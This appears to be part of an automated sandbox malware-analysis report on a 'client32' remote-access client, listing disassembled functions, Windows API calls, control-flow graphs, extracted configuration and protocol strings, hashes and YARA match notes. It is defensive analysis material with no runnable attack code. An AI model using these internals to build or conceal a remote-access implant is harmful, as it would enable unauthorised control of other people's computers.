                                                        • Opcode ID: 0aca1979a8b40330feb026a925631bbf072c9ab4aa1e9dcba116c2c53325dd2e
                                                        • Instruction ID: 79cce8e325d1ff2264d6913acd6930832bfb3e6363bf0221359440810bb14152
                                                        • Opcode Fuzzy Hash: 0aca1979a8b40330feb026a925631bbf072c9ab4aa1e9dcba116c2c53325dd2e
                                                        • Instruction Fuzzy Hash: 15014CB6600219AFD710DF98CC89BAEF7BCFF48705F10456DE90697184DBB06A04CBA1
                                                        Function 11095820 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,11096B50,00000244,cant create events), ref: 1109583C
                                                        • CloseHandle.KERNEL32(?,00000000,11096B50,00000244,cant create events), ref: 11095845
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: bb2189a0ce0e681acf5e2c3f9941def6db024e7673ae4e4681922f78f91d01b4
                                                        • Instruction ID: 2dc9c20525e0398814adb1e9c50c9e564b761da8d4f29b98c64898ead9ee3d7b
                                                        • Opcode Fuzzy Hash: bb2189a0ce0e681acf5e2c3f9941def6db024e7673ae4e4681922f78f91d01b4
                                                        • Instruction Fuzzy Hash: 32E0EC71704211ABE738CF159C94FA777ECAF04B01F11496EF957E6184CA61E8408B64
                                                        Function 1102CD80 Relevance: 229.3, APIs: 31, Strings: 99, Instructions: 1762windowthreadsleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • GetSystemMetrics.USER32(00002000), ref: 1102CF04
                                                        • FindWindowA.USER32(NSMWClass,00000000), ref: 1102D0C5
                                                          • Part of subcall function 111035C0: GetCurrentThreadId.KERNEL32 ref: 11103656
                                                          • Part of subcall function 111035C0: InitializeCriticalSection.KERNEL32(-00000010,?,1102F49F,00000001,00000000), ref: 11103669
                                                          • Part of subcall function 111035C0: InitializeCriticalSection.KERNEL32(111DC080,?,1102F49F,00000001,00000000), ref: 11103678
                                                          • Part of subcall function 111035C0: EnterCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110368C
                                                          • Part of subcall function 111035C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F49F), ref: 111036B2
                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102D101
                                                        • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102D129
                                                        • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102D3E6
                                                          • Part of subcall function 1108DAC0: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102D158,00000000,?,00000100,00000000,00000000,00000000), ref: 1108DADC
                                                          • Part of subcall function 1108DAC0: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102D158,00000000,?,00000100,00000000,00000000,00000000), ref: 1108DAE9
                                                          • Part of subcall function 1108DAC0: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 1108DB19
                                                        • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102D188
                                                        • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102D194
                                                        • CloseHandle.KERNEL32(00000000), ref: 1102D1AC
                                                        • FindWindowA.USER32(NSMWClass,00000000), ref: 1102D1B9
                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102D1DB
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102CF36
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • LoadIconA.USER32(11000000,000004C1), ref: 1102D571
                                                        • LoadIconA.USER32(11000000,000004C2), ref: 1102D581
                                                        • DestroyCursor.USER32(00000000), ref: 1102D5AA
                                                        • DestroyCursor.USER32(00000000), ref: 1102D5BE
                                                        • GetVersion.KERNEL32(?,?,?,?,?,00000000,00000000,?,?,View,Client,Bridge), ref: 1102DAEF
                                                        • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,View,Client,Bridge), ref: 1102DB42
                                                        • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,00000000,?,?,View,Client), ref: 1102E054
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102E08E
                                                        • DispatchMessageA.USER32(?), ref: 1102E098
                                                        • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102E0AA
                                                        • CloseHandle.KERNEL32(00000000,11025FA0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102E345
                                                        • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102E37A
                                                        • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,00000000), ref: 1102E381
                                                        • SetWindowPos.USER32(0001042A,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102E3B1
                                                        • CloseHandle.KERNEL32(00000000,11055780,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102E42F
                                                        • wsprintfA.USER32 ref: 1102E575
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • PostMessageA.USER32(NSMWControl32,00000000,Default,Client,UseIPC,00000001,00000000), ref: 1102E66C
                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E680
                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E6A6
                                                        • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1102E6CC
                                                          • Part of subcall function 11134460: GetVersionExA.KERNEL32(111DC648,75A38400), ref: 11134490
                                                          • Part of subcall function 11134460: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 111344CF
                                                          • Part of subcall function 11134460: _memset.LIBCMT ref: 111344ED
                                                          • Part of subcall function 11134460: _strncpy.LIBCMT ref: 111345AF
                                                          • Part of subcall function 11134460: RegCloseKey.KERNEL32(00000000), ref: 111345BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$Process$CloseWindow$HandleOpenPost$CriticalSectionThreadVersionwsprintf$CreateCurrentCursorDestroyEventFindIconInitializeLoadPeekToken_memset$ClassDispatchEnterErrorExitLastMetricsObjectPrioritySendSingleSleepSystemWait__wcstoi64_malloc_strncpy
                                                        • String ID: *BeepSound$*BeepUsingSpeaker$*PriorityClass$*ScreenScrape$*StartupDelay$494126$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$License Control Internal Error$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$V11.41.3$V12.01.3$View$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                        • API String ID: 4073474852-168708017
                                                        • Opcode ID: 7d63a2f86f363bdc8f7d980eb446afbe20efb3e3794d17a61fc403d34e28377a
                                                        • Instruction ID: 75a99128c0b90555870f3e8937819581192e292699187335c5c1593c45ddfd72
                                                        • Opcode Fuzzy Hash: 7d63a2f86f363bdc8f7d980eb446afbe20efb3e3794d17a61fc403d34e28377a
                                                        • Instruction Fuzzy Hash: EEE2D174E41261AFEB11DB64DCC8F9EF7A5AB4930CF5081A9ED18A7384EB706D40CB61
                                                        Function 1102C2A0 Relevance: 79.4, APIs: 15, Strings: 30, Instructions: 614COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1265 1102c2a0-1102c2f0 call 11102870 1268 1102c2f2-1102c306 call 11131ea0 1265->1268 1269 1102c308 1265->1269 1271 1102c30e-1102c353 call 11131740 call 11131f10 1268->1271 1269->1271 1277 1102c4f3-1102c502 call 11134180 1271->1277 1278 1102c359 1271->1278 1287 1102c508-1102c518 1277->1287 1280 1102c360-1102c363 1278->1280 1281 1102c365-1102c367 1280->1281 1282 1102c388-1102c391 1280->1282 1284 1102c370-1102c381 1281->1284 1285 1102c397-1102c39e 1282->1285 1286 1102c4c4-1102c4dd call 11131f10 1282->1286 1284->1284 1288 1102c383 1284->1288 1285->1286 1290 1102c493-1102c4a8 call 11151867 1285->1290 1291 1102c3a5-1102c3a7 1285->1291 1292 1102c4aa-1102c4bf call 11151867 1285->1292 1293 1102c43a-1102c46d call 11150341 call 11131740 1285->1293 1294 1102c47b-1102c491 call 111524f0 1285->1294 1295 1102c42b-1102c435 1285->1295 1296 1102c46f-1102c479 1285->1296 1297 1102c3ec-1102c3f2 1285->1297 1298 1102c41c-1102c426 1285->1298 1286->1280 1312 1102c4e3-1102c4e5 1286->1312 1299 1102c51a 1287->1299 1300 1102c51f-1102c533 call 1102b5c0 1287->1300 1288->1286 1290->1286 1291->1286 1307 1102c3ad-1102c3e7 call 11150341 call 11131740 call 1102b5c0 1291->1307 1292->1286 1293->1286 1294->1286 1295->1286 1296->1286 1308 1102c3f4-1102c408 call 11151867 1297->1308 1309 1102c40d-1102c417 1297->1309 1298->1286 1299->1300 1316 1102c538-1102c53d 1300->1316 1307->1286 1308->1286 1309->1286 1318 1102c5e3-1102c5fd call 11135660 1312->1318 1319 1102c4eb-1102c4f1 1312->1319 1316->1318 1321 1102c543-1102c568 call 110ae410 call 111356e0 1316->1321 1332 1102c653-1102c65f call 11029eb0 1318->1332 1333 1102c5ff-1102c618 call 11059580 1318->1333 1319->1277 1319->1287 1341 1102c573-1102c579 1321->1341 1342 1102c56a-1102c571 1321->1342 1344 1102c661-1102c668 1332->1344 1345 1102c638-1102c63f 1332->1345 1333->1332 1348 1102c61a-1102c62c 1333->1348 1346 1102c57b-1102c582 call 11026a90 1341->1346 1347 1102c5d9 1341->1347 1342->1318 1349 1102c645-1102c648 1344->1349 1350 1102c66a-1102c674 1344->1350 1345->1349 1352 1102c815-1102c836 GetComputerNameA 1345->1352 1346->1347 1363 1102c584-1102c5b6 1346->1363 1347->1318 1348->1332 1364 1102c62e 1348->1364 1353 1102c64a-1102c651 call 110ae410 1349->1353 1354 1102c679 1349->1354 1350->1352 1355 1102c838-1102c86c call 11026950 1352->1355 1356 1102c86e-1102c874 1352->1356 1360 1102c67c-1102c750 call 11026600 call 11026900 call 11026600 * 2 LoadLibraryA GetProcAddress 1353->1360 1354->1360 1355->1356 1384 1102c8c2-1102c8ce 1355->1384 1361 1102c876-1102c87b 1356->1361 1362 1102c8aa-1102c8bd call 111524f0 1356->1362 1413 1102c756-1102c76d 1360->1413 1414 1102c7e5-1102c7ed SetLastError 1360->1414 1368 1102c881-1102c885 1361->1368 1383 1102cab7-1102cada 1362->1383 1380 1102c5c0-1102c5cf call 110eaeb0 1363->1380 1381 1102c5b8-1102c5be 1363->1381 1364->1345 1372 1102c8a1-1102c8a3 1368->1372 1373 1102c887-1102c889 1368->1373 1382 1102c8a6-1102c8a8 1372->1382 1378 1102c88b-1102c891 1373->1378 1379 1102c89d-1102c89f 1373->1379 1378->1372 1386 1102c893-1102c89b 1378->1386 1379->1382 1387 1102c5d2-1102c5d4 call 1102bb50 1380->1387 1381->1380 1381->1387 1382->1362 1382->1384 1395 1102cb02-1102cb0a 1383->1395 1396 1102cadc-1102cae2 1383->1396 1393 1102c8d0-1102c8e5 call 110ae410 call 11028730 1384->1393 1394 1102c8e7-1102c8fa call 1107c3b0 1384->1394 1386->1368 1386->1379 1387->1347 1419 1102c943-1102c95c call 1107c3b0 1393->1419 1409 1102c921-1102c923 1394->1409 1410 1102c8fc-1102c91f 1394->1410 1403 1102cb1c-1102cba8 call 11150341 * 2 call 111356e0 * 2 GetCurrentProcessId call 110e2d70 call 110269b0 call 111356e0 call 11150781 1395->1403 1404 1102cb0c-1102cb19 call 11131f00 call 11150341 1395->1404 1396->1395 1401 1102cae4-1102cafd call 1102bb50 1396->1401 1401->1395 1404->1403 1418 1102c930-1102c941 1409->1418 1410->1419 1423 1102c7ae-1102c7ba 1413->1423 1436 1102c76f-1102c778 1413->1436 1414->1423 1418->1418 1418->1419 1437 1102c962-1102c9dd call 111356e0 call 110c4d10 call 110c6530 call 110ae410 wsprintfA call 110ae410 wsprintfA 1419->1437 1438 1102ca9c-1102caa9 call 111524f0 1419->1438 1428 1102c7bc-1102c7c8 1423->1428 1429 1102c7fd-1102c80c 1423->1429 1433 1102c7da-1102c7de 1428->1433 1434 1102c7ca-1102c7d8 GetProcAddress 1428->1434 1429->1352 1435 1102c80e-1102c80f FreeLibrary 1429->1435 1441 1102c7e0-1102c7e3 1433->1441 1442 1102c7ef-1102c7f1 SetLastError 1433->1442 1434->1433 1435->1352 1436->1423 1440 1102c77a-1102c792 call 1111cad0 1436->1440 1473 1102c9f3-1102ca09 call 1111a8e0 1437->1473 1474 1102c9df-1102c9ee call 11027fb0 1437->1474 1456 1102caac-1102cab1 CharUpperA 1438->1456 1440->1423 1453 1102c794-1102c7a9 call 11026640 1440->1453 1447 1102c7f7 1441->1447 1442->1447 1447->1429 1453->1423 1456->1383 1478 1102ca22-1102ca5c call 110c5c80 * 2 1473->1478 1479 1102ca0b-1102ca1d call 110c5c80 1473->1479 1474->1473 1486 1102ca72-1102ca9a call 111524f0 call 110c5870 1478->1486 1487 1102ca5e-1102ca6d call 11027fb0 1478->1487 1479->1478 1486->1456 1487->1486
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _malloc_memsetwsprintf
                                                        • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/03/14 09:15:42 V12.01F3$494126$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape
                                                        • API String ID: 3802068140-2798778214
                                                        • Opcode ID: 40ab1cae0201a3aeec5452140a15d371d84d6b28c0bec86021d57b66dd7050fb
                                                        • Instruction ID: 1eedb420cbd5dfcbbda3fd0d1686de8f37d34dfb32158dca5f9b22f0844981e9
                                                        • Opcode Fuzzy Hash: 40ab1cae0201a3aeec5452140a15d371d84d6b28c0bec86021d57b66dd7050fb
                                                        • Instruction Fuzzy Hash: 1232D575D002659FDB11DF94CD84BEEB7B9AB44308F8485E9E918A7280EB706B84CF61
                                                        Function 6C812380 Relevance: 72.2, APIs: 11, Strings: 30, Instructions: 403COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1913 6c812380-6c8123c2 call 6c81f9b0 call 6c812200 1917 6c8123c7-6c8123cf 1913->1917 1918 6c8123d1-6c8123eb call 6c820641 1917->1918 1919 6c8123ec-6c8123ee 1917->1919 1921 6c8123f0-6c812404 call 6c805910 1919->1921 1922 6c812407-6c812421 call 6c8078f0 1919->1922 1921->1922 1928 6c812423-6c812444 call 6c804e80 call 6c820641 1922->1928 1929 6c812445-6c8124c4 call 6c804950 * 2 call 6c8161a0 call 6c8048e0 lstrlenA 1922->1929 1942 6c8124c6-6c812515 call 6c81bf20 call 6c803b60 call 6c803280 call 6c81f95f 1929->1942 1943 6c812518-6c81263e call 6c804000 call 6c804b10 call 6c816230 * 2 call 6c8162c0 * 3 call 6c803b60 call 6c8162c0 call 6c81f95f call 6c8162c0 gethostname call 6c8162c0 call 6c809ea0 1929->1943 1942->1943 1978 6c812640 1943->1978 1979 6c812645-6c812661 call 6c8162c0 1943->1979 1978->1979 1982 6c812663-6c812675 call 6c8162c0 1979->1982 1983 6c812678-6c81267e 1979->1983 1982->1983 1985 6c8128c0-6c812908 call 6c816120 call 6c81f95f call 6c808270 call 6c815da0 1983->1985 1986 6c812684-6c8126a2 call 6c8048e0 1983->1986 2014 6c812937-6c81294f call 6c820641 1985->2014 2015 6c81290a-6c812936 call 6c808c00 call 6c820641 1985->2015 1993 6c8126a4-6c8126d7 call 6c803b60 call 6c8162c0 call 6c81f95f 1986->1993 1994 6c8126da-6c812704 call 6c8048e0 1986->1994 1993->1994 2002 6c812851-6c8128bd call 6c8162c0 call 6c8048e0 call 6c8162c0 call 6c8048e0 call 6c8162c0 1994->2002 2003 6c81270a-6c81284e call 6c803b60 call 6c8162c0 call 6c81f95f call 6c8048e0 call 6c803b60 call 6c8162c0 call 6c81f95f call 6c8048e0 call 6c803b60 call 6c8162c0 call 6c81f95f call 6c8048e0 call 6c803b60 call 6c8162c0 call 6c81f95f 1994->2003 2002->1985 2003->2002
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: *Dept$*ER$*Gsk$1.1$494126$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$ER=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c
                                                        • API String ID: 2102423945-3098530097
                                                        • Opcode ID: 031b0b13ae9a54065355bca3b95f9dc4946f54c13ece6cab5b4a8a0e4ba8a3be
                                                        • Instruction ID: eecdcd59b7ba812e24aecc33d7c0d4c098be75a7c2b8205350224315e7edacb6
                                                        • Opcode Fuzzy Hash: 031b0b13ae9a54065355bca3b95f9dc4946f54c13ece6cab5b4a8a0e4ba8a3be
                                                        • Instruction Fuzzy Hash: E0E199729002286BCB30DB649D80EEF7778AF59319F004DE9E509A7A41EB745B8CDF90
                                                        Function 111329C0 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2058 111329c0-11132a01 GetModuleFileNameA 2059 11132a43 2058->2059 2060 11132a03-11132a16 call 1107c480 2058->2060 2062 11132a49-11132a4d 2059->2062 2060->2059 2066 11132a18-11132a41 LoadLibraryA 2060->2066 2064 11132a69-11132a87 GetModuleHandleA GetProcAddress 2062->2064 2065 11132a4f-11132a5c LoadLibraryA 2062->2065 2068 11132a97-11132ac0 GetProcAddress * 4 2064->2068 2069 11132a89-11132a95 2064->2069 2065->2064 2067 11132a5e-11132a66 LoadLibraryA 2065->2067 2066->2062 2067->2064 2070 11132ac3-11132b3b GetProcAddress * 10 call 11150781 2068->2070 2069->2070 2072 11132b40-11132b43 2070->2072
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,771B23A0), ref: 111329F3
                                                        • LoadLibraryA.KERNEL32(?), ref: 11132A3C
                                                        • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11132A55
                                                        • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11132A64
                                                        • GetModuleHandleA.KERNEL32(?), ref: 11132A6A
                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 11132A7E
                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 11132A9D
                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11132AA8
                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11132AB3
                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 11132ABE
                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11132AC9
                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11132AD4
                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 11132ADF
                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 11132AEA
                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11132AF5
                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11132B00
                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 11132B0B
                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11132B16
                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 11132B21
                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 11132B2C
                                                          • Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
